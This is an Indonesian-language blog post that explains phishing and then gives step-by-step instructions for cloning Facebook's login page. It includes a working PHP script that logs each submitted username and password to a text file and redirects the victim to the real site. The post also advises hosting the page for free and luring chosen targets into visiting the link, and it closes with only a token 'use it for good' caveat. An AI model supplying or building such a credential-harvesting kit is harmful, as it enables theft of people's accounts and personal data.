Phising modus operandinya adalah berusaha membuat seseorang mengunjungi situs yang salah sehingga memberikan informasi rahasia berupa username dan pasword maupun hal lainnya. umumnya pelaku membuat situs yang memiliki nama domain mirip dengan aslinnya, istilah phising identik dengan web spoofing, DNS spoofing, dan pharming. Teknik phising ini juga di kenal dengan sebutan teknik fake login, di mana seseorng login di halaman yang bukan sebelumnya.
Cara kerja Phising adalah, seseorang memasukkan username dan pasword dari sebuah halaman login palsu, username dan pasword tersebut akan terekam dan di kirim ke pembuat halaman login palsu tersebut, walaupun cara kerjanya sederhana namun akurat dan mampu mengelabui korban,
Langsung saja kita coba tekniknya :
- Buka http://www.facebook.com/login.php ( kita menggunakan halaman depan fb untuk mengelabuih korban ) klik kanan kemudian pilih yang saya tandai, catatan di sini saya menggunakan web browser google Chrome.
- Kemudian copy dan paste scrip yang muncul tersebut ke Notepad
- Cari Kode "action=" (tanpa tanda kutip),anda bisa gunakan CTRL+ F untuk mencari , untuk modifikasi, Disini saya memodifikasi di Sublime Text sebelum saya copy ke notepad , terserah dari anda bagaimana bagusnya bisa langsung di copy di notepad langsung modifikasi.
- Pada action ="https://login.facebook.com/login.php", ubahlah menjadi action="secret.php" kemudian ubah juga methode dari "POST" menjadi "GET"
- simpan file tersebut dengan nama index.php supaya menjadi file berjenis php bukan TXT, dalam kotak dialog Save As, Pada bagian Save as type, pilih All files.
- Sekarang buka lembaran Notepad yang baru, dan isikan script berikut simpan dengan nama file secret.php
<?php
header("Location: http://www.facebook.com/login.php ");
$handle = fopen("pass.txt", "a");
foreach ($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
# code...
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
- Buka notepad lagi dan biarkan isinya kosong, dan simpan dengan nama pass.txt
- Upload ketiga file tersebut "index.php" secret.php, pass.txt" ke dalam website hosting Anda. anda bisa menggunkan hosting gratis
- Kini ada sudah berhasil memiliki sebuah halaman phising facebook.
Tugas anda sekarang adalah menyebarkan link supaya orang bersedia membuka link/url yang berisikan halaman fecebook palsu tersebut, ketahui target anda dan hal apa yang mereka sukai agar mereke membuka link tersebut, apabila ada orang yang mengaksesnya dan mencoba login dari halaman tersebut, yang muncul adalah halaman facebook yang asli yang menyatakan bahwa password yang dimasukan adalah salah.
Cara seperti di atas, tidak akan mengubah tampilan di content asli facebook tapi tetap. sewaktu seseorang memasukkan password pada halaman tersebut, password akan terkirm ke dalam file pass.txt yang telah anda buat sebelumnya.
catatan : GUNAKAN CARA DI ATAS UNTUK HAL KEBAIKAN.
WASSALAM



Post a Comment for "TIPS DAN TRIK PHISING 100% WORK"